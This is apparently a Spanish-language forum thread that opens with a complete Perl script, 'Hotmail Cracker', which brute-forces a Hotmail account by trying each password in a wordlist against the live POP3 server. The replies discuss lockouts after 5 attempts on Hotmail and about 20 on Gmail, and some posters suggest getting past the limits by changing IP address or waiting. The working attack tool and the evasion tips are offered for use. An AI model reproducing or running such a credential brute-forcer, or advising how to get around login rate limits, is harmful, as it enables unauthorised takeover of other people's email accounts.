Un simple script para crackear una cuenta Hotmail.
#Hotmail Cracker 0.1
#Coded By Doddy H
#http://search.cpan.org/~sdowd/Mail-POP3Client-2.18/POP3Client.pm
#http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
#ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
use Mail::POP3Client;
use IO::Socket::SSL;
head();
if($ARGV[0] and $ARGV[1]) {
crackhot($ARGV[0],$ARGV[1]);
} else {
print "\n[+] Sintax : $0 <email> <wordlist>\n";
}
copyright();
sub crackhot {
my($user,$wordlist) = @_ ;
unless(-f $wordlist) {
print "\n[-] Wordlist not found\n";
copyright();
}
print "\n[+] Loading wordlist\n";
open(FILE,$wordlist);
my @passwords = <FILE>;
close FILE;
print "\n[+] Words Found : ".int(@passwords)."\n";
print "\n[+] Cracking...\n\n";
for my $pass(@passwords) {
chomp $pass;
my $so = IO::Socket::SSL->new(PeerAddr=>"pop3.live.com",PeerPort => 995,Proto => "tcp");
my $nave = Mail::POP3Client->new();
$nave->User($user);
$nave->Pass($pass);
$nave->Socket($so);
if ($nave->Connect()) {
print "\a\a\n[+] Email : $user\n";
print "[+] Password : $pass\n";
$so->close();
$nave->close();
copyright();
}
$so->close();
$nave->close();
}
print "\n[+] Password not found\n";
}
sub head {
print "\n\n-- == Hotmail Cracker == --\n\n";
}
sub copyright {
print "\n\n(C) Doddy Hackman 2012\n\n";
exit(1);
}
# The End ?
Como utilizo el codigo...
no se si ya es un tema viejo pero el programa esta obsoleto debido a que en el intento 5 el programa deja de funcionar y no encuentra nada.
Justamente eso te iba a decir, hay un limite de intentos, asi que hacer fuerza bruta no sirve para nada.
Saludos ;D
y si , pero por suerte Gmail no tiene ese problema (segun lo que eh probado hace 2 meses).
NO JODAS! Yo uso gmail, me estas diciendo que cualquiera con un diccionario y un script como ese puede entrar en mi correo?
ja , me equivoque , lo acabo de probar con Gmail y solo aguanta hasta el intento 20 xDD.
No hay más que ver como se aplica el límite de fallos y según las prohibiciones aplicarle un par de parches. Si es por IP, cambio de IP etc.
La putada viene cuando los límites se aplican a cada gmail,ahí tocará esperar el tiempo necesario para continuar con el bruteforce, cosa que puede demorar muchísimo tiempo.
Menos mal xD
Hay alguna forma de continuar con el crackeo despues que espere que pase el tiempo del nuevo intento ? Sería bueno colocarlo a prueba.
Saludos.
Realmente no creo que sea tan facil como cambiar la IP o esperar 5 minutos, pero si funciona voy a estar bastante decepcionado con la seguridad de los correos.
si lo hay no quiero saberlo , prefiero usar los modulos de este programa para intentar hace un cliente de hotmail para leer mis correos , me parece mas constructivo xDD.
Cita de: Doddy en 18 Junio 2012, 16:48 PM
si lo hay no quiero saberlo , prefiero usar los modulos de este programa para intentar hace un cliente de hotmail para leer mis correos , me parece mas constructivo xDD.
Yo creo que por probar a entrar en tu propio correo no pasa nada, a mi me gustaria saber si la seguridad del correo que utilizo es buena o mala, pero es cierto que sigue siendo mas constructivo hacer un cliente para entrar a tu correo.
Saludos ;D
Cita de: daniyo en 18 Junio 2012, 18:34 PM
Yo creo que por probar a entrar en tu propio correo no pasa nada, a mi me gustaria saber si la seguridad del correo que utilizo es buena o mala, pero es cierto que sigue siendo mas constructivo hacer un cliente para entrar a tu correo.
Saludos ;D
Cualquier cosa que sea con fines de saciar la curiosidad es constructivo xD
Me dejas probar a mi modificando tu code Doddy? :xD
Un saludo :)
si queres hacerlo no me opongo xDD.
Cita de: daniyo en 18 Junio 2012, 16:24 PM
Realmente no creo que sea tan facil como cambiar la IP o esperar 5 minutos, pero si funciona voy a estar bastante decepcionado con la seguridad de los correos.
Si tu contraseña es lo bastante fuerte, piensa que ya tardarían eones sin pausas, con las pausas se vuelve imposible.
La seguridad me parece suficiente tal como está, la verdad.
5 intentos cada 5 minutos es muy poco.